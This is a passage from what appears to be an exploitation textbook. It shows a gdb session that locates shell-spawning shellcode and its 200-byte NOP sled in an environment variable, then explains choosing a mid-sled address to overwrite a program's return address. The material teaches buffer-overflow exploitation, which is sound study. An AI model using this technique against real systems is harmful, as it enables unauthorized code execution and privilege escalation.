A breakpoint is set at the beginning of main() , and the program is run.
This will set up memory for the program, but it will stop before anything
happens. Now we can examine memory down near the bottom of the stack.
(gdb) i r esp
esp 0xbffff660 0xbffff660
(gdb) x/24s $esp + 0x240
0xbffff8a0: ""
0xbffff8a1: ""
0xbffff8a2: ""
0xbffff8a3: ""
0xbffff8a4: ""
0xbffff8a5: ""
0xbffff8a6: ""
0xbffff8a7: ""
0xbffff8a8: ""
0xbffff8a9: ""
0xbffff8aa: ""
0xbffff8ab: "i686"
0xbffff8b0: "/home/reader/booksrc/notesearch"
0xbffff8d0: "SSH_AGENT_PID=7531"
0xbffff8e3: "SHELLCODE=", '\220' <repeats 190 times>...
0xbffff9ab: "\220\220\220\220\220\220\220\220\220\2201�1�1�\231���\200j\vXQh//shh/bin\211�Q\211�S\211��\200"
0xbffff9d9: "TERM=xterm"
0xbffff9e4: "DESKTOP_STARTUP_ID="
0xbffff9f8: "SHELL=/bin/bash"
0xbffffa08: "GTK_RC_FILES=/etc/gtk/gtkrc:/home/reader/.gtkrc-1.2-gnome2"
0xbffffa43: "WINDOWID=39845969"
0xbffffa55: "USER=reader"
0xbffffa61: "LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=0"...
0xbffffb29: "1;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=0"...
(gdb) x/s 0xbffff8e3
0xbffff8e3: "SHELLCODE=", '\220' <repeats 190 times>...
(gdb) x/s 0xbffff8e3 + 100
0xbffff947: '\220' <repeats 110 times>, "1�1�1�\231���\200j\vXQh//shh/bin\211�Q\211�S\211��\200"
(gdb)
The debugger reveals the location of the shellcode (the shellcode string following the NOP sled in the listing above, shown in bold). When the program is run outside of the debugger, these addresses might be a little different: the debugger also keeps some information of its own on the stack, which shifts the addresses around a bit. But with a 200-byte NOP sled, these inconsistencies aren't a problem if an address near the middle of the sled is picked. In the output above, the address 0xbffff947 is shown to be close to the middle of the NOP sled, which should give us enough wiggle room. After determining the address of the injected shellcode instructions, the exploitation is simply a matter of overwriting the return address with this address.